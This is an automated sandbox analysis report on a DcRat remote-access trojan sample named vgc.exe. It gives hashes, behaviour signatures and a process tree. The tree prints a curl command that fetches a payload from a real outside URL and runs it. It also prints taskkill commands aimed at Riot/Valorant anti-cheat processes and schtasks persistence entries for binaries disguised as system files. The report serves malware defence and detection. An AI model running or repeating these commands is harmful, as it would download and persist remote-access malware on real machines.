Analysis
-
max time kernel
29s -
max time network
32s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
07-12-2024 03:41
Static task
static1
Behavioral task
behavioral1
Sample
vgc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
vgc.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
vgc.exe
Resource
win11-20241007-en
General
-
Target
vgc.exe
-
Size
56KB
-
MD5
6b66076ea9dd9855bb6f8592f3778299
-
SHA1
0851a6843651c4a890f5417eede54c76bb2357b2
-
SHA256
fa2b6e2595af4fd8b7e4cedc88daf254d829132be6cb5e51fd4dbce8323f1665
-
SHA512
0dc87c60fc6c0106fb79344de207a0b17ef3c46cef0ad8035cb3fc91393c1167b0189c6ae80114b938b227136ea62b9f08be756a81846d4303d7bfd81e8db1b4
-
SSDEEP
768:T/lUHY89mrZe0xBz71sGRQGsUfzG27YNkTjq7FUMHJH:T/loM71RQGsuzZFnq7FUm
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1812 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2276 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1576 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3464 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3812 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5092 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3868 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3740 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3560 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1528 4548 schtasks.exe 89 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1560 4548 schtasks.exe 89 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation vgc.exe Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation Winver.exe -
Executes dropped EXE 3 IoCs
pid Process 1960 physmeme.exe 664 Winver.exe 708 conhost.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Defender\fr-FR\088424020bedd6 Winver.exe File created C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe Winver.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 408 cmd.exe 3896 PING.EXE -
Kills process with taskkill 5 IoCs
pid Process 3416 taskkill.exe 552 taskkill.exe 4312 taskkill.exe 3428 taskkill.exe 2544 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings Winver.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3896 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1828 schtasks.exe 1576 schtasks.exe 1848 schtasks.exe 5092 schtasks.exe 1560 schtasks.exe 1992 schtasks.exe 1680 schtasks.exe 3464 schtasks.exe 2160 schtasks.exe 1528 schtasks.exe 1812 schtasks.exe 3812 schtasks.exe 3560 schtasks.exe 2540 schtasks.exe 4912 schtasks.exe 3868 schtasks.exe 3740 schtasks.exe 2276 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 664 Winver.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe 708 conhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 876 vgc.exe Token: SeDebugPrivilege 664 Winver.exe Token: SeDebugPrivilege 4312 taskkill.exe Token: SeDebugPrivilege 3428 taskkill.exe Token: SeDebugPrivilege 2544 taskkill.exe Token: SeDebugPrivilege 3416 taskkill.exe Token: SeDebugPrivilege 552 taskkill.exe Token: SeDebugPrivilege 708 conhost.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 876 wrote to memory of 1332 876 vgc.exe 81 PID 876 wrote to memory of 1332 876 vgc.exe 81 PID 876 wrote to memory of 3940 876 vgc.exe 82 PID 876 wrote to memory of 3940 876 vgc.exe 82 PID 3940 wrote to memory of 4940 3940 cmd.exe 83 PID 3940 wrote to memory of 4940 3940 cmd.exe 83 PID 876 wrote to memory of 1960 876 vgc.exe 84 PID 876 wrote to memory of 1960 876 vgc.exe 84 PID 876 wrote to memory of 1960 876 vgc.exe 84 PID 1960 wrote to memory of 4072 1960 physmeme.exe 85 PID 1960 wrote to memory of 4072 1960 physmeme.exe 85 PID 1960 wrote to memory of 4072 1960 physmeme.exe 85 PID 4072 wrote to memory of 1180 4072 WScript.exe 93 PID 4072 wrote to memory of 1180 4072 WScript.exe 93 PID 4072 wrote to memory of 1180 4072 WScript.exe 93 PID 1180 wrote to memory of 664 1180 cmd.exe 95 PID 1180 wrote to memory of 664 1180 cmd.exe 95 PID 664 wrote to memory of 1868 664 Winver.exe 114 PID 664 wrote to memory of 1868 664 Winver.exe 114 PID 1868 wrote to memory of 3008 1868 cmd.exe 116 PID 1868 wrote to memory of 3008 1868 cmd.exe 116 PID 1868 wrote to memory of 3896 1868 cmd.exe 117 PID 1868 wrote to memory of 3896 1868 cmd.exe 117 PID 876 wrote to memory of 408 876 vgc.exe 118 PID 876 wrote to memory of 408 876 vgc.exe 118 PID 408 wrote to memory of 4312 408 cmd.exe 119 PID 408 wrote to memory of 4312 408 cmd.exe 119 PID 876 wrote to memory of 2972 876 vgc.exe 120 PID 876 wrote to memory of 2972 876 vgc.exe 120 PID 2972 wrote to memory of 3428 2972 cmd.exe 121 PID 2972 wrote to memory of 3428 2972 cmd.exe 121 PID 876 wrote to memory of 4880 876 vgc.exe 122 PID 876 wrote to memory of 4880 876 vgc.exe 122 PID 4880 wrote to memory of 2544 4880 cmd.exe 123 PID 4880 wrote to memory of 2544 4880 cmd.exe 123 PID 876 wrote to memory of 2148 876 vgc.exe 124 PID 876 wrote to memory of 2148 876 vgc.exe 124 PID 2148 wrote to memory of 3416 2148 cmd.exe 125 PID 2148 wrote to memory of 3416 2148 cmd.exe 125 PID 876 wrote to memory of 4556 876 vgc.exe 126 PID 876 wrote to memory of 4556 876 vgc.exe 126 PID 4556 wrote to memory of 552 4556 cmd.exe 127 PID 4556 wrote to memory of 552 4556 cmd.exe 127 PID 1868 wrote to memory of 708 1868 cmd.exe 128 PID 1868 wrote to memory of 708 1868 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 4 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\vgc.exe"C:\Users\Admin\AppData\Local\Temp\vgc.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4940
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\ESD\Winver.exe"C:\ESD/Winver.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TZw2MWS1NC.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:3008
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3896
-
-
C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe"C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:708
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im VALORANT-Win64-Shipping.exe >nul 2>&12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\taskkill.exetaskkill /f /im VALORANT-Win64-Shipping.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im VALORANT.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\taskkill.exetaskkill /f /im VALORANT.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im RiotClientServices.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\taskkill.exetaskkill /f /im RiotClientServices.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgtray.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgtray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im vgc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\taskkill.exetaskkill /f /im vgc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\ESD\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\ESD\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\ESD\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\ESD\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ESD\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ESD\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\ESD\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1528
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\ESD\Winver.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3812
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD58decf43a92645d8ba4b81696c5e7b1ae
SHA1dcc9ca8b24e3adf7568eb0f6b7f5cd27f039faf6
SHA2566ad34bd4e803fad802052423aeab64f4c60dd3ee55a3167425b9640ae24bfea1
SHA51272e44773f484d2e69ebd41cc555d9a57c833b3930e1f3b0326c90882035e0dc5fb54e8d4ded22cf9f2d28fb502b37b133b7c1c9f9d89b8c21857b569c51ebc17
-
Filesize
1.8MB
MD5d9ce1032fee5365065a78bbff7267883
SHA14c7471b47d4151908dd204303421d7c64cf4c5c6
SHA25665d26e7c0b856832e88efefe5c2a9e767fb2a7345715bbd0a6e10f9ac2afb520
SHA5120455364fa91c07da6fecbfb3e3fdbbbcb909e3176b5b151e3653f8b8ebffc02e14fb3471245df479b83f90cd2e1142bcff82b80555cfb3df113696b2925d9435
-
Filesize
57B
MD5d1a4f1e326e7dfca62327ea69446dc7c
SHA1253e264c90cbd15836d8c3a1eab3c26756d94047
SHA256ea091556a5dbab314a6029817a9db64f9b8adc7afb476bbbb11aec0c227f0de2
SHA5123d4624c169297b50329a4e13f3f559a7a1f02112f6482e45cfba747dad11c6e6642f1411cec5e92d7890f86fb38702f48c75fec4d24332d43484ad7b9dbf29c8
-
Filesize
185B
MD5fdc48c553c15777daf7d8fd986319e27
SHA15525490a54bd482524719a2abf3c6c928fe59215
SHA256a302af87ab51a739e96509a0e04db83478bbacd3fb4981c557e7477eee3b0faa
SHA512149b68fac73f50feffc8b8fffb33e965b73532f2511f39bd711d9dd64a4f64f6bec70cedc7b6e9976e9ca102e9dbe8ad857480d2145016f65565b806a599ee27
-
Filesize
2.1MB
MD56261ec3f13e1cc6ae25ee8942db137b0
SHA120629ed3f752869dc4980827291bf3064333405f
SHA256a6429d9778a93254c7387cf588619a2635ed97108558a122de885aad25a57eb7
SHA512ed292a77db5e9926cbaa247e449a4019776b2452d2e8cdadfcea4c3d7551372793b2a1125b44cfd5106d2b03ff178041d413750ee81bfc42d7a3252a934b51f1